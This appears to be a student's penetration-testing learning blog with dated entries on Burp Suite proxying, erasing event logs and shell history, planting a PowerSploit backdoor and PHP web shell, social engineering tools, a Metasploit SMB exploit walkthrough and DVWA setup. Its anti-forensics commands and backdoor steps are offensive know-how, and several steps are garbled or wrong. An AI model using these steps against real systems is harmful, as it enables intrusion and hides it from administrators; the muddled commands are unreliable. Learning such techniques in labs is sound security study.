May 29

Burp Suite is an integrated platform for performing security testing of web applications. It is an integration of various tools put together for performing security testing of Web applications. Burp Suite is used to identify vulnerabilities and exploit them.

 

1.) Check your IP address by using ifconfig/ipconfig.

2.) Activate the interface you want to use in proxy options.

3.) Make sure the intercept is on.

4.) Set up the browser in the request-response process so that it is routed through port 8080 of your localhost in advanced network settings.

5.) Open any website that you want to find the vulnerabilities and the port number which you listened. Burp Suite will show information such as cookie, etc.

6.)  The spider tool is used to get a complete list of URLs and parameters for each site. To run the spider on your Burp Suite, switch off your target interceptor.

7.) The site map aggregates all of the information that Burp has gathered about applications.

May 29

There’s a script called clearev to clear all event logs in metasploit meterpreter. The program will enter the event logs on a Windows system and clear all logs in the system. This action will remove our connection and attempted connection from the log files. Most admin systems are not vigilant to this, but some admin might find this suspicious.

To remove our history, we can use the command:

  • Simply type “clearev”  in meterpreter.

 

We have to make certain that our command history is erased before leaving the compromised. The bash shell we’re typing in will save our last 500 commands. A system admin could track all of our commands and detect and decipher our activities on the system and potentially use them as evidence.

To see our history, use the more command:

  • more ~/.bash_history

 

The size of our file history is determined by the variable HISTSIZE. We could then set it to zero by typing:

  • export HISTSIZE=0

Now, our shell will not store any of our history! If you change the HISTSIZE to zero before beginning the hack, none of the commands will be stored.

May 28

An attacker that have gained access to the target system can choose to use both the system and the resources inside the system, and further use the system as a launch pad to scan and exploit other systems, or keep on exploiting the current system in stealth mode.

 

Tools and Methods for Maintaining Access

A backdoor is a tool to access into the already breached system. Powershell provides access at the application level, but to gain it, the user needs to install the piece of malware locally. Powershell can be used to sneak out passwords, credentials, and any other sensitive information stored on the system.

 

Powersploit is a tool that is for Windows machines. It has PowerShell installed in victims machine. This tool helps the hacker to connect with the victim’s machine via PowerShell.

1.) Open the folder of powerspoilt. 

 

2.)  Download this tool on the victim’s machine to create a web server, which powersploit tools allow to create.

 

3.) The web of the target directory will look like this.

 

4.) Use a command to listen to connect the terminal to the target by typing “sbd -l -p ServerIP -v”.

 

5.) On the server site change the target port to match with the terminal by typing “sbd ServerIP port” on the terminal and you will get connected to the web.

 

6.) Open webshell folder by typing “cd /user/share/webshells/” and then open the php.

 

7.) To upload the shell to a web server, for example “backdoor.php” open the webpage and URL of the web shell.

 

8.) At the end, write the cmd command. You will have all the info of the target.

May 27

Social engineering is an attack vector that relies heavily on human interaction and often involves tricking people into breaking normal security procedures. I learned that there are 7 types of social engineering attacks, and social engineering can take many forms depending on the medium used to implement the attack.

 

The 7 types of social engineering attacks are phishing, spear phishing, vishing, pretexting, baiting, tailgating, and quid pro quo. Among them, phishing is the most common type of social engineering attack. The attacker create a copy of an website and send the link through social media, the target not knowing of the attack may end up putting their personal information on the website, such as email, password, bank account, etc.

 

Tools used for social engineering:

  • Social Engineering Toolkit(SET)
  • Gophish
  • SocialFish
May 25

Target exploitation is one of the step in doing a penetration test. It focuses on establishing access to a system by bypassing the security restrictions. Although finding an exploit can be done in various ways, one of the most common methods for exploits is by baiting the target to enter their information into malicious websites, and the target information will be exploited by the hacker. Target exploitation could be done by using Metasploit.

 

1. Make new IP address interface
– ifconfig (interface) (IPAddress) (subnetMask)
– sudo (interface) (IPAddress) (subnetMask) | To check if the interface exist

2. Start the Metasploit
– msfconsole

3. In this case, we try using Windows 9
– use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

4. read the target list by show command
– show options
– show targets

5. set LHOST (our IPAddress)

6. set RHOST (target’s IPAddress)

7. set PAYLOAD

8. exploit

The goal is to read the target information to find vulnerabilities and as Proof of Concept(POC).

May 11

DVWA installation

1.) Download the file.

2.) unzip master.zip

3.) move the content from DVWA-master to web root directory in /var/www/html and change and make them the owner

4.) start apache2 and mysql, then install mysql

5.) create database and give all privileges to a user

6.) open the config and change the config based on the database

7.) click create/reset database